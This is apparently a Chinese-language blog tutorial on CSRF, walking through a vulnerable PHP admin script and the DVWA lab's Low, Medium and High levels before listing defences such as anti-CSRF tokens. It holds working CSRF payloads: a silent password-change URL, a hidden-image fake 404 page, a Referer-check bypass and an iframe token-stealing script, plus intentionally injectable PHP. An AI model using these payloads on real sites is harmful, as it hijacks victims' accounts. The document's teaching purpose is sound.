CSRF漏洞原理淺談

By : Mirror王宇陽

E-mail : [email protected]

筆者并未深挖過CSRF，內容居多是參考《Web安全深度剖析》、《白帽子講web安全》等諸多網路技術文章

CSRF跨站請求攻擊，和XSS有相似之處；攻擊者利用CSRF可以盜用用戶的身份進行攻擊

CSRF攻擊原理

部分摘自《Web安全深度剖析》第十章

當我們打開或登錄某個網站后，瀏覽器與網站所存放的服務器將會產生一個會話，在會話結束前，用戶就可以利用具有的網站權限對網站進行操作（如：發表文章、發送郵件、洗掉文章等），會話借宿后，在進行權限操作，網站就會告知會話超期或重新登錄，

當登錄網站后，瀏覽器就會和可信的站點建立一個經過認證的會話，所有通過這個經過認證的會話發送請求，都被認定為可信的行為，例如轉賬、匯款等操作，當這個會話認證的時間過長或者自主結束斷開；必須重新建立經過認證的可信安全的會話，

CSRF攻擊是建立在會話之上，比如：登錄了網上銀行，正在進行轉賬業務，這是攻擊者給你發來一個URL，這個URL是攻擊者精心構造的Payload，攻擊者精心構造的轉賬業務代碼，而且與你登錄的是同一家銀行，當你認為這是安全的鏈接后點擊進去，你的錢就沒了！

比如想給用戶xxser轉賬1000元，正常的URL是：

secbug.org/pay.jsp?user=xxser&money=1000

而攻擊者構造的URL則是：

secbug.org/pay.jsp?user=hack&money=10000

CSRF漏洞利用

CSRF漏洞常常被用來制作蠕蟲攻擊、SEO流量等

分析漏洞代碼

• 獲取GET引數username和password，然后通過select陳述句查詢是否存在對應的用戶，如果存在通過$_SESSION設定一個session:isadmin=admin ，否則設定session：isadmin=guest
• 判斷session中的isadmin是否為admin，如果isadmin!=admin說明用戶沒有登錄，那么跳轉到登錄頁面，所以只有在管理員登錄后才可以執行用戶的操作
• 獲取POST引數username和password然后插入users表中，完成添加用戶的操作

<?php
	
	session_start();
	if (isset($_GET['login'])) {
		$con=mysqli_connect("127.0.0.1","root","123456","test");
		if (mysql_connect_errno()) {
			echo "連接失敗".mysql_connect_errno();
		}
		$username = addslashes($_GET['username']);
		$password = $_GET['password'];
		$result = mysqli_query($con , "select * from users where username='".$username."' and password='".md5($password)."'");
		$row = mysqli_fetch_array($result);
		if($row){
			$_SESSION['isadmin'] = 'admin';
			exit("登錄成功");
		} else{
			$_SESSION['isadmin'] = 'guest';
			exit("登錄失敗");
		}
	} else{
		$_SESSION['isadmin'] = 'guest';
	}
	if($_SESSION['isadmin'] != 'admin'){
		exit("請登錄……");
	}
	if(isset($_POST['submit'])){
		if (isset($_POST['username'])) {
			$result1 = mysqli_query($con,"insert into users(username , password) value ('".$_POST['username']."','".md5($_POST['password'])."')");
			exit($_POST['username']."添加成功");
		}
	}
?>

這是后臺php原始碼

攻擊者需要做的就是構造一個請求，請求的URL就是php檔案的URL，引數是submit=1&username=1&password=1,請求payload會自動的利用原始碼的特性添加一個用戶

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>CSRF漏洞實踐</title>
</head>
<body>
	<script type="text/javascript">
		var pauses = new Array("16");
		var methods = new Array("POST");
		var urls = new Array("isadmin.php");
		var params = new Array("submit=1&username=1&password=1");
		function pausecomp(millis){
			var date = new Date();
			var curDate = null ; 
			do{
				curDate = new Date();
			}while(curDate-date<millis);
		}
		function run(){
			var count = 1 ; 
			var i = 0 ; 
			for( i=0 ; i < count ; i ++){
				makeXHR(methods[i],urls[i],params[i])；
				pausecomp(pausecomp[i]);

			}
		}
		var http_request = false ; 
		function makeXHR(method , url , paramters){
			http_request = false ; 
			if(window.XMLHttpRequest){
				http_request = new XMLHttpRequest() ; 
				if(http_request.overrideMinmeType){
					http_request.overrideMinmeType('text/html');
				}
			} else if(window.ActiveXObject){
				try{
					http_request = new ActiveXObject("Msxml2.XMLHTTP");
				} catch(e){
					try{
						http_request = new ActiveXObject("Microsoft.XMLHTTP");
					} catch (e){ }
				}
			}
			if(!http_request){
				alert('Cannot create XMLHTTP instance');
				return false;
			}
			if(method == 'GET'){
				if(url.indexOf('?') == -1){
					url = url + '?' + paramters;
				} else{
					url = url + '&' + paramters;

				}
				http_request.open(method,url,true);
				http_request.send("");

			} else if(method == 'POST'){
				http_request.open(method,url,true);
				http_request.setRequestHeader("Content-type","application/x-www.form-urlencoded");
				http_request.setRequestHeader("Content-length",paramters.length);
				http_request.setRequestHeader("Connection","close");
				http_request.send(paramters);
			}
		}
	</script>
</body>
</html>

DVWA平臺CSRF

筆者找不到比較好的原始碼，于是找到了DVWA~~

Low

• 前端原始碼

  <h3>Change your admin password:</h3>
  <br>
  <form action="#" method="GET">
  	New password:<br>
  	<input autocomplete="off" name="password_new" type="password"><br>
  	Confirm new password:<br>
  	<input autocomplete="off" name="password_conf" type="password"><br>
  	<br>
  	<input value=https://www.cnblogs.com/wangyuyang1016/p/"Change" name="Change" type="submit">
  
  

  前端的原始碼非常的簡單，是一個修改密碼的CSRF，表單采用GET方式Change提交

• 后端原始碼

  <?php
  
  if( isset( $_GET[ 'Change' ] ) ) {
      // Get input
      $pass_new  = $_GET[ 'password_new' ];
      $pass_conf = $_GET[ 'password_conf' ];
  
      // Do the passwords match?
      if( $pass_new == $pass_conf ) {
          // They do!
          $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
          $pass_new = md5( $pass_new );
  
          // Update the database
          $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
          $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  
          // Feedback for the user
          echo "<pre>Password Changed.</pre>";
      }
      else {
          // Issue with passwords matching
          echo "<pre>Passwords did not match.</pre>";
      }
  
      ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  }
  
  ?> 
  

  可以看見后端接收資料后會驗證兩次密碼是否重復，然后修改密碼~~~

• 構造Payload

  http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#
  

  我們將Payload發送給受害者，受害者處于會話保持（登錄狀態）中，受害者一旦點擊這個URL鏈接，就意味著受害者執行了同樣的操作；這個程序就是CSRF

  筆者處于的DVWA使用的登錄密碼，而我的密碼就被改為“123456”

• 重點

  這里的攻擊成立是利用受害者的Cookie向服務器發送偽造請求（Payload），如果用戶使用的是一個與xxser.com保持會話登錄的瀏覽器點擊Payload-URL，受害者的密碼就會發生更改，

  哦！對了！這么裸露的攻擊Payload在2019年安全意識高端的現代，是不會有人點擊的！這個時候我們就有好玩的一個工具叫：“短鏈接”，百度、新浪的短網址服務都可以！

  為了減少圖片內容，我們當密碼修改后的頁面會提示“Password Changed.”

• 高明的做法（從一位前輩copy過來的，忘記鏈接了！）

  都知道會出現提示，要想悄悄的修改！可以建立一個攻擊網頁，誘騙受害者訪問

  <!DOCTYPE html>
  <html>
  <head>
  	<meta charset="utf-8">
  	<title>Payload</title>
  </head>
  <body>
  	<img src=https://www.cnblogs.com/wangyuyang1016/p/"http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display: none">
  	
  404
  	
  file not found.
  
  
  

  頁面的作用是加載一個偽404的頁面；實際上一旦訪問這個頁面，就會加載圖片，所謂加載圖片就是加載src屬性，而src屬性則為Payload-URL，實際的行為就是加載該html頁面的同時圖片會加載，也就執行了Payload 你說好不好玩！加載一個404偽頁面，就把自己的密碼給該了，而且自己還不知道！

Medium

• 后端原始碼（ 添加了http_referer頭的校驗 ）

  <?php
  
  if( isset( $_GET[ 'Change' ] ) ) {
      // HTTP_REFERER :查詢當前頁的前一頁的地址資訊
      // SERVER_NAME  :獲取域名
      if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
          // stripos() :查字符第一次出現的位置，
          $pass_new  = $_GET[ 'password_new' ];
          $pass_conf = $_GET[ 'password_conf' ];
  
          // Do the passwords match?
          if( $pass_new == $pass_conf ) {
              // They do!
              $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
              $pass_new = md5( $pass_new );
  
              // Update the database
              $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
              $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  
              // Feedback for the user
              echo "<pre>Password Changed.</pre>";
          }
          else {
              // Issue with passwords matching
              echo "<pre>Passwords did not match.</pre>";
          }
      }
      else {
          // Didn't come from a trusted source
          echo "<pre>That request didn't look correct.</pre>";
      }
  
      ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  }
  
  ?> 
  

  檢查HTTP_REFERER（http資料包的referer引數值）即上一級URL地址資訊是否包含當前HTTP資料包中的Host引數值；包含則表示當前頁面是從DVWA即上一級URL合法的行為，

  合法的http資料包：

  GET /DVWA-master/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  DNT: 1
  Referer: http://127.0.0.1/DVWA-master/vulnerabilities/csrf/
  Cookie: security=medium; PHPSESSID=nfafklof4unqinb2b0jvvpl943
  X-Forwarded-For: 8.8.8.8
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  

  留意第2行、第8行

• 分析繞過

  但是stripos()函式寫的頭驗證是可以繞過的~ stripos()函式是多次匹配； 只要包含了目標主機地址就可以繞過stripos()函式寫的驗證陳述句

  如果我們依舊按照建立一個偽造的攻擊頁面，stripos()頭驗證就會驗證，然而頁面并不是來自DVWA；于是深挖stripos()函式的漏洞，發現函式會多次匹配，于是思路就是_{建立一個假的檔案名，通過一個偽造的檔案名，繞過stripos()的驗證}

• Payload

  GET /DVWA-master/vulnerabilities/csrf/?password_new=mirror11&password_conf=mirror11&Change=Change HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
  Accept: */*
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  DNT: 1
  Referer: http://127.0.0.1/127.0.0.1.html
  Cookie: security=medium; PHPSESSID=nfafklof4unqinb2b0jvvpl943
  X-Forwarded-For: 8.8.8.8
  Connection: keep-alive
  

  這里注意！我們將Payload命名為“127.0.0.1.html”，

High

• 后端原始碼

  <?php
  
  if( isset( $_GET[ 'Change' ] ) ) {
      // 加入 Anti-CSRF token機制
      checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
  
      // Get input
      $pass_new  = $_GET[ 'password_new' ];
      $pass_conf = $_GET[ 'password_conf' ];
  
      // Do the passwords match?
      if( $pass_new == $pass_conf ) {
          // They do!
          $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
          $pass_new = md5( $pass_new );
  
          // Update the database
          $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
          $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  
          // Feedback for the user
          echo "<pre>Password Changed.</pre>";
      }
      else {
          // Issue with passwords matching
          echo "<pre>Passwords did not match.</pre>";
      }
  
      ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  }
  
  // Generate Anti-CSRF token
  generateSessionToken();
  
  ?> 
  

  加入 Anti-CSRF Token機制，用戶訪問改密頁面時，服務器回傳token，只有用戶提交token引數才可以進行改密行為！

• 分析繞過

  我們構造Payload頁面的時候，就需要考慮到執行改密行為必須向服務器發送token，而token只有在改密頁面才可以獲得；

  根據前輩的思路：利用受害者的cookie去改密頁面獲取token

  <script type="text/javascript">
   
      function attack()
   
    {
   
     document.getElementsByName('user_token')[0].value=https://www.cnblogs.com/wangyuyang1016/p/document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
   
    document.getElementById("transfer").submit(); 
   
    }
   
  </script>
   
  <iframe src=https://www.cnblogs.com/wangyuyang1016/p/"http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
   
  </iframe>
   
  <body οnlοad="attack()">
   
    
  
   
     
   
      
   
     
   
    
   
     
   
  
  

  攻擊思路是當受害者點擊進入這個頁面，腳本會通過一個看不見框架偷偷訪問修改密碼的頁面，獲取頁面中的token，并向服務器發送改密請求，以完成CSRF攻擊，

  然而理想與現實的差距是巨大的，這里牽扯到了跨域問題，而現在的瀏覽器是不允許跨域請求的，這里簡單解釋下跨域，我們的框架iframe訪問的地址是http://169.254.36.73/DVWA-master/vulnerabilities/csrf/，位于服務器169.254.36.73上，而我們的攻擊頁面位于黑客服務器上，兩者的域名不同，域名B下的所有頁面都不允許主動獲取域名A下的頁面內容，除非域名A下的頁面主動發送資訊給域名B的頁面，所以我們的攻擊腳本是不可能取到改密界面中的user_token，

  由于跨域是不能實作的，所以我們要將攻擊代碼注入到目標服務器169.254.36.73中，才有可能完成攻擊，下面利用High級別的XSS漏洞協助獲取Anti-CSRF token（因為這里的XSS注入有長度限制，不能夠注入完整的攻擊腳本，所以只獲取Anti-CSRF token）

  這里的Name存在XSS漏洞，于是抓包，改引數，成功彈出token
  原文鏈接：https://blog.csdn.net/liweibin812/article/details/86468880

  

筆者通過DVWA平臺的CSRF實體，簡單的總結了CSRF的特性和應對措施，也由于筆者沒有就這方面進行研究，沒有辦法進一步深度的解剖原理

CSRF應對措施

• 從DVWA的測驗中總結：

  在Impossible級別的原始碼中，利用了PDO技術防御SQL注入，防護CSRF方面則要求用戶原始密碼；攻擊者在不知道原始密碼的情況下是無法進行CSRF的哦！筆者從網路中搜集了幾篇文章，筆者對這些文章就不做剖解了直接copy地址

  PDO防SQL注入原理分析：https://www.cnblogs.com/leezhxing/p/5282437.html

CSRF防御手段

• 使用POST，限制GET

  GET方式最容易受到CSRF攻擊，只要簡單的構造payload就可能導致CSRF；使用POST可以大程度的減低CSRF曝光率

• 瀏覽器Cookie策略

  老瀏覽器會攔截第三方本地Cookie的發送，而新瀏覽器則不會攔截發送；

• 添加驗證碼

  簡單粗暴還有效；可以大程度的增加人機互動的程序，避免用戶被悄悄的偷襲

• Referer Check

  檢查請求是否來自于合法的源

• Anti CSRF Token

  Token的值必須是隨機的，不可預測的，由于Token的存在，攻擊者無法再構造一個帶有合法Token的請求實施CSRF攻擊，另外使用Token時應注意Token的保密性，盡量把敏感操作由GET改為POST，以form或AJAX形式提交，避免Token泄露，

• 總結：

  CSRF攻擊是攻擊者利用用戶的身份操作用戶帳戶的一種攻擊方式，通常使用Anti CSRF Token來防御CSRF攻擊，同時要注意Token的保密性和隨機性，

標籤：其他

上一篇：MSF命令大全詳解

下一篇：TCP協議